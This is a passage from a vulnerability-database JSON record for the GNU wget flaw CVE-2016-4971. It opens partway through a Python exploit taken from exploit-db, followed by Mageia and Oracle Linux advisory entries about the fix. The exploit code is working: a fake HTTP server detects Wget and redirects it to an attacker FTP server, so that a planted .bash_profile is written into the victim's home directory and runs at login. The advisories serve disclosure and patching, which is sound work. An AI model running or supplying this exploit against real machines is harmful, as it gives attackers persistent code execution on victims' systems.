.wgetrc/.bash_profile/$file\r\n\r\n print(\"We have a volunteer requesting \" + self.path + \" by GET :)\\n\")\r\n if \"Wget\" not in self.headers.get('User-Agent'):\r\n print(\"But it's not a Wget :( \\n\")\r\n self.send_response(200)\r\n self.end_headers()\r\n self.wfile.write(\"Nothing to see here...\")\r\n return\r\n\r\n self.send_response(301)\r\n print(\"Uploading \" + str(FILE) + \"via ftp redirect vuln. It should land in /home/ \\n\")\r\n new_path = 'ftp://anonymous@{}:{}/{}'.format(FTP_HOST, FTP_PORT, FILE)\r\n\r\n print(\"Sending redirect to %s \\n\"%(new_path))\r\n self.send_header('Location', new_path)\r\n self.end_headers()\r\n\r\n\r\nHTTP_LISTEN_IP = '192.168.72.2'\r\nHTTP_LISTEN_PORT = 80\r\nFTP_HOST = '192.168.72.4'\r\nFTP_PORT = 2121\r\nFILE = '.bash_profile'\r\n\r\nhandler = socketserver.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)\r\n\r\nprint(\"Ready? Is your FTP server running?\")\r\n\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nresult = sock.connect_ex((FTP_HOST, FTP_PORT))\r\nif result == 0:\r\n print(\"FTP found open on %s:%s. Let's go then\\n\" % (FTP_HOST, FTP_PORT))\r\nelse:\r\n print(\"FTP is down :( Exiting.\")\r\n exit(1)\r\n\r\nprint(\"Serving wget exploit on port %s...\\n\\n\" % HTTP_LISTEN_PORT)\r\n\r\nhandler.serve_forever()", "sourceHref": "https://www.exploit-db.com/download/49815", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "GNU wget before 1.18 allows remote servers to write to arbitrary files by redirecting a request from HTTP to a crafted FTP resource (CVE-2016-4971). Fixed a potential race condition by creating files with .tmp ext and making them accessible to the current user only (CVE-2016-7098). 
\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-09-28T05:59:24", "type": "mageia", "title": "Updated wget packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971", "CVE-2016-7098"], "modified": "2016-09-28T05:59:24", "id": "MGASA-2016-0323", "href": "https://advisories.mageia.org/MGASA-2016-0323.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2021-07-30T06:24:24", "description": "[1.14-13]\n- Fix CVE-2016-4971 (#1345778)\n- Added support for non-ASCII URLs (Related: CVE-2016-4971)\n[1.14-12]\n- Fix wget to include Host header on CONNECT as required by HTTP 1.1 (#1203384)\n- Run internal test suite during build (#1295846)\n- Fix -nv being documented as synonym for two options (#1147572)\n[1.14-11]\n- Fix CVE-2014-4877 wget: FTP symlink arbitrary filesystem access (#1156136)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-11-09T00:00:00", "type": "oraclelinux", "title": "wget security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4877", "CVE-2016-4971"], "modified": "2016-11-09T00:00:00", "id": "ELSA-2016-2587", "href": "http://linux.oracle.com/errata/ELSA-2016-2587.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}